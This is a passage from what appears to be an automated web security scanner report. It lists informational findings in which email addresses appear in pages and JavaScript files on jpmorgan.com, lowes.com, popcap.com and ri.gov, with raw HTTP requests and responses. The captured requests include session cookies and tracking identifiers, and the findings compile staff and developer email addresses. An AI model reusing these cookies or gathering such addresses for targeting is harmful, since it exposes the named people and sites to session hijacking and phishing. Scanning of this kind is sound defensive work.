Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; ResonanceSegment=1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Thu, 07 Jul 2011 18:54:36 GMT
ETag: "289c-1b77-3f911300"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 7031
Cache-Control: max-age=5488
Date: Tue, 12 Jul 2011 16:35:27 GMT
Connection: close

/**
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.8a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD
...[SNIP]...

19.47. http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched

Issue detail

The following email address was disclosed in the response:

benjamin.g.larter@jpmorgan.com

Request

Response

19.48. http://www.jpmorgan.com/script/jquery.pngFix.pack.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/jquery.pngFix.pack.js

Issue detail

The following email address was disclosed in the response:

andreas.eberhard@gmail.com

Request

Response

19.49. http://www.jpmorgan.com/script/lightbox_support/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/script/lightbox_support/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

Response

19.50. http://www.jpmorganchase.com/corporate/includes/javascript/jScrollTouch.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorganchase.com
Path:	/corporate/includes/javascript/jScrollTouch.js

Issue detail

The following email address was disclosed in the response:

damien@dealinium.com

Request

GET /corporate/includes/javascript/jScrollTouch.js HTTP/1.1
Host: www.jpmorganchase.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jpmorganchase.com/corporate/Home/home.htm

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:26:48 GMT
Content-length: 3183
Content-type: application/x-javascript
Last-modified: Tue, 19 Apr 2011 14:18:11 GMT
Etag: "c6f-4dad99a3"
Accept-ranges: bytes

/*
* jQuery jScrollTouch plugin 1.1
*
* Copyright (c) 2010 Damien Rottemberg damien@dealinium.com
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*
*
*/

(function($){
$.fn.jScrol
...[SNIP]...

19.51. http://www.jpmorganchase.com/corporate/includes/javascript/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorganchase.com
Path:	/corporate/includes/javascript/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /corporate/includes/javascript/jquery.cookie.js HTTP/1.1
Host: www.jpmorganchase.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jpmorganchase.com/corporate/Home/home.htm

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:26:49 GMT
Content-length: 4341
Content-type: application/x-javascript
Last-modified: Wed, 21 Jul 2010 17:10:15 GMT
Etag: "10f5-4c4729f7"
Accept-ranges: bytes

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

19.52. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following email address was disclosed in the response:

a.fulciniti@html.it

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com
Cookie: MBJT=3npJGdCEGA39cXndCp1mhBo99ohPFg9QUCqlPZDTH03dVbJkclo_8Rw; akaau=1310508130~id=1c4ed4773ab2b33abb47cb68f3f868cd

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 28 Apr 2009 19:56:32 GMT
ETag: "pv20dd41aa3cf554eca08a0506a9c3f0b7"
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 8950
Expires: Tue, 12 Jul 2011 21:32:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:17 GMT
Connection: close
Vary: Accept-Encoding

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the Li
...[SNIP]...

19.53. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following email address was disclosed in the response:

a.fulciniti@html.it

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpL0emnRAXCBEyb1P3TIgvN33O5bKg83oIP9HgETjY0njRr0u8xYTB20%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=3; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"http://www.lowes.com/pc_Flooring_4294934373_4294937087_","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; stop_mobi=yes; TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 28 Apr 2009 19:56:32 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 8950
Expires: Tue, 12 Jul 2011 21:31:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:31:40 GMT
Connection: keep-alive
Vary: Accept-Encoding

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the Li
...[SNIP]...

19.54. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following email address was disclosed in the response:

xxx@domain.com

Request

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Tue, 12 Jul 2011 21:31:37 GMT
Content-Length: 68157
Connection: keep-alive
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Tue, 12-Jul-2011 22:01:37 GMT
Set-Cookie: TS176ebc=3557926829ef74993d5214d92b1ba1ff3ddff0b185006e134e1cbb8e; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta chars
...[SNIP]...
<div class="form-input-help">
                                       Example: xxx@domain.com
                                   </div>
...[SNIP]...

19.55. http://www.popcap.com/js/jquery/plugins/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popcap.com
Path:	/js/jquery/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /js/jquery/plugins/jquery.cookie.js HTTP/1.1
Host: www.popcap.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; PHPSESSID=76pelmajogplbteaspie6s6ce0; lv=1310503142; user_profile=001000000000000

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/javascript
Cache-Control: max-age=1
Expires: Tue, 12 Jul 2011 20:39:07 GMT
Last-Modified: Wed, 11 Feb 2009 23:46:57 GMT
ETag: "3b2d35-1096-49936371"
X-Frame-Options: sameorigin
X-Cacheable: NO: !beresp.cacheable
Content-Length: 4246
Date: Tue, 12 Jul 2011 20:39:06 GMT
X-Varnish: 1706177279
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-IP: .72
X-Cache: MISS

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

19.56. http://www.ri.gov/js/fontsizer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ri.gov
Path:	/js/fontsizer.js

Issue detail

The following email address was disclosed in the response:

stefan.sedich@gmail.com

Request

GET /js/fontsizer.js HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/press/view/14202
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:31:44 GMT
Server: www
Last-Modified: Fri, 09 Nov 2007 16:29:17 GMT
ETag: "aea-43e817be2b140"
Accept-Ranges: bytes
Content-Length: 2794
Content-Type: application/x-javascript

/**
* Purpose: Font sizer class, handles increasing and decreasing font size of a page.
* It increases the font in 10% increments. By getting the level / 10 + 1.
*
...[SNIP]...
it(options); the two options are
* min and max, for the min level and max level.
* Defaults are min: -3 and max: 5.
*
* Author: Stefan Sedich (stefan.sedich@gmail.com
*/

$jquery = jQuery;

$jquery.FontSizer = {

options : {
level: 0,
min: -3,
max: 5
},

Init : function(options) {

...[SNIP]...

19.57. http://www.ri.gov/js/jquery_cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ri.gov
Path:	/js/jquery_cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /js/jquery_cookie.js HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/press/view/14202
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:31:44 GMT
Server: www
Last-Modified: Mon, 09 May 2011 18:30:16 GMT
ETag: "f61-4a2dc07e81e00"
Accept-Ranges: bytes
Content-Length: 3937
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

19.58. http://www.ri.gov/opengovernment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ri.gov
Path:	/opengovernment/

Issue detail

The following email address was disclosed in the response:

AcctControl@gw.doa.state.ri.us

Request

GET /opengovernment/ HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:52 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 5559
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>RI.gov</title>

<link rel="stylesheet" href="/styles/applications/screen.cs
...[SNIP]...
<a href="mailto:AcctControl@gw.doa.state.ri.us">AcctControl@gw.doa.state.ri.us</a>
...[SNIP]...

19.59. http://www.ri.gov/plugins/mozilla_search.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ri.gov
Path:	/plugins/mozilla_search.xml

Issue detail

The following email address was disclosed in the response:

rihelp@neinetwork.com

Request

GET /plugins/mozilla_search.xml HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:35:35 GMT
Server: www
Last-Modified: Wed, 25 Oct 2006 16:49:36 GMT
ETag: "2fe-420a578d8a800"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 766
Content-Type: text/xml

<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>RI.gov Statewide Search</ShortName>
<Description>Search Rhode Island State Government Web Sites and Information</Des
...[SNIP]...
<Contact>rihelp@neinetwork.com</Contact>
...[SNIP]...

19.60. http://www.ri.gov/styles/ui-widgets.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ri.gov
Path:	/styles/ui-widgets.css

Issue detail

The following email address was disclosed in the response:

licensing@wijmo.com

Request

GET /styles/ui-widgets.css HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/press/view/14202
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:31:43 GMT
Server: www
Last-Modified: Wed, 25 May 2011 19:33:37 GMT
ETag: "36d5-4a41ec7ecc640"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 14037
Content-Type: text/css
X-Pad: avoid browser bug

/*
*
* Wijmo Aristo Theme
* http://wijmo.com/
*
* Copyright(c) ComponentOne, LLC. All rights reserved.
*
* Dual licensed under the MIT or GPL Version 2 licenses.
* licensing@wijmo.com
* http://www.wijmo.com/license
*
* Based on the Aristo theme concept created by 280 North and Pinvoke (https://github.com/280north/aristo).
*
*/

/* Layout helpers
----------------------
...[SNIP]...

19.61. http://www.ri.gov/subscriber/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ri.gov
Path:	/subscriber/

Issue detail

The following email address was disclosed in the response:

rihelp@nicusa.com

Request

GET /subscriber/ HTTP/1.1
Host: www.ri.gov
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/loginsystem/login_form.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:18 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 19151
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...
<a class="email" href="mailto:rihelp@nicusa.com">rihelp@nicusa.com</a>
...[SNIP]...

19.62. https://www.ri.gov/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/about/

Issue detail

The following email address was disclosed in the response:

rigov@nicusa.com

Request

GET /about/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:27 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 18754
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...
<a href="mailto:rigov@nicusa.com">rigov@nicusa.com</a>
...[SNIP]...

19.63. https://www.ri.gov/about/staff.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/about/staff.php

Issue detail

The following email addresses were disclosed in the response:

dchapman@egov.com
jalba@egov.com
llessard@egov.com
lmann@egov.com
mauclair@egov.com
nicolec@egov.com
samir@egov.com
tomv@egov.com

Request

GET /about/staff.php HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/about/awards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:36:31 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 24912
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...
<a href="mailto:jalba@egov.com">jalba@egov.com</a>
...[SNIP]...
<a href="mailto:samir@egov.com">samir@egov.com</a>
...[SNIP]...
<a href="mailto:mauclair@egov.com">mauclair@egov.com</a>
...[SNIP]...
<a href="mailto:dchapman@egov.com">dchapman@egov.com</a>
...[SNIP]...
<a href="mailto:nicolec@egov.com">nicolec@egov.com</a>
...[SNIP]...
<a href="mailto:llessard@egov.com">llessard@egov.com</a>
...[SNIP]...
<a href="mailto:lmann@egov.com">lmann@egov.com</a>
...[SNIP]...
<a href="mailto:tomv@egov.com">tomv@egov.com</a>
...[SNIP]...

19.64. https://www.ri.gov/js/fontsizer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/js/fontsizer.js

Issue detail

The following email address was disclosed in the response:

stefan.sedich@gmail.com

Request

GET /js/fontsizer.js HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
